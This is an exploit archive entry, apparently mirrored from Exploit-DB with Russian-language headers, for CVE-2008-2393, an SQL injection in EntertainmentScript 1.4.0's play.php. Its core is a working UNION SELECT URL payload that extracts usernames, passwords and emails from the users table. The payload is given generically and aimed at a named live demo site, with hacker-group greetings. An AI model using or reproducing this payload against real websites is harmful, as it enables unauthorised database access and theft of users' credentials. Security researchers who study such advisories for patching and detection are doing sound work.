Exploit EntertainmentScript 1.4.0 - 'play.php' SQL Injection

[Exploiter]

EDB-ID

5654

Проверка EDB

1. Пройдено

Автор

MR.SQL

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-2393

Дата публикации

2008-05-19

#########################################
# rEm0te SQL Injection Vulnerability    
#                                       
# EntertainmentScript V1.4.0  (( play.php id ))
#                                       
#########################################

## Script : EntertainmentScript.com   V1.4.0   name script on demo site is ( fastfreemedia )

## DeMo :  http://demo.fastfreemedia.com/index.php
       
	       
#########################################

## AuTh0r : Mr.SQL

## H0ME  : WwW.PaL-HaCkEr.CoM

## Email  :  [email protected]

#########################################

## D0rK ::         :)) not found

###################################################################################

##  (()) -(:: SQL ::)- (())

www.Site.com/
              play.php?id=-96969+union+select+0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,password),3,4,email,6+from+users/*

--------

##  :: liVe DeMO ::

http://demo.fastfreemedia.com/play.php?id=-96969+union+select+0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,password),3,4,email,6+from+users/*


###########################################################################

  Gr33Tz   :: HaCkEr-EGy :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH ::     (( MuslimS HaCkErS ))   
                  
##########################################################################
                                                  -((:::: Geek Inj3cT0r ::::))-

# milw0rm.com [2008-05-19]